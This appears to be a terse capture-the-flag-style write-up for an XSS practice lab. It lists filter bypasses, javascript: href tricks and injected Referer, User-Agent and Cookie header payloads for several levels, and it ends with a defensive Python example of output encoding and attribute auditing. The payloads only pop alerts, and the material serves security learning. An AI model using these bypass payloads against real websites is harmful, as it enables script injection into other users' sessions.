Contents
Lab environment
Tools used for testing
level3
level5
level6
level7
level8
level9
level10
level11
level12
level13
level14
Browser: Firefox; plugin: HackBar; tools: Burp
Note: common payloads are in the comments section.
" ' <> scRiPt oNeEror oNcLicK a hReF
<>, script and onclick are filtered; bypass with an a tag
asd">
keyword=">asd&submit=%E6%90%9C%E7%B4%A2


error click a ">
keyword="oonnclick ="javascript:alert(1)&submit=%E6%90%9C%E7%B4%A2

scr_ipt o_nerror o_nclick a hr_ef">友情链接
Bypass with hexadecimal encoding
javascript:alert(1)
友情链接
" ' <> script oneeror onclick a href
javascript:alert('http://www.baidu.com')
友情链接
javascript:alert('http://www.baidu.com')
t_sort=11
t_sort=11"type="button" onclick="alert(11)
Intercept the request and modify the Referer header
GET /level11.php?keyword=12 HTTP/1.1
Referer: " type="text" onclick="alert(11)
t_ua" value="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36" type="hidden">
User-Agent: "type="text" onclick="alert(11)
Cookie: user= " onfocus=alert(/xss/) type="text
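
The Referer, User-Agent and Cookie requests above all depend on a header value being reflected into the `value` attribute of a hidden input, where a double quote closes the attribute. The Python sketch below is an added example, not code from the original post or from the lab: it compares a blacklist that strips only angle brackets (an assumed filter) with attribute-context encoding, then audits the rendered tag. The names `render_blacklist`, `render_encoded` and `audit` are hypothetical, and the sample value is constructed from the request shown above.

```python
import html
from html.parser import HTMLParser

EXPECTED = {"name", "value", "type"}  # attributes the template itself emits


def render_blacklist(ua: str) -> str:
    # Assumed filter: only angle brackets are stripped before reflection.
    cleaned = ua.replace("<", "").replace(">", "")
    return f'<input name="t_ua" value="{cleaned}" type="hidden">'


def render_encoded(ua: str) -> str:
    # Attribute-context output encoding: quotes become &quot; / &#x27;.
    return f'<input name="t_ua" value="{html.escape(ua, quote=True)}" type="hidden">'


class _InputCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.inputs = []

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.inputs.append(attrs)


def audit(markup: str) -> list:
    """Return findings for <input> tags whose attribute set differs from the template."""
    parser = _InputCollector()
    parser.feed(markup)
    parser.close()
    findings = []
    for attrs in parser.inputs:
        names = [name for name, _ in attrs]
        for name in names:
            if name.startswith("on"):
                findings.append(f"event handler attribute: {name}")
            elif name not in EXPECTED:
                findings.append(f"unexpected attribute: {name}")
        if names.count("type") > 1:
            findings.append("duplicate type attribute")
    return findings


# Constructed sample: the header value shown in the request above.
SAMPLE_UA = '" type="text" onclick="alert(11)'

if __name__ == "__main__":
    print(audit(render_blacklist(SAMPLE_UA)))
    print(audit(render_encoded(SAMPLE_UA)))
```

The same audit can be run in a regression test against any template that reflects request headers, so a change that drops the encoding step fails the build.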
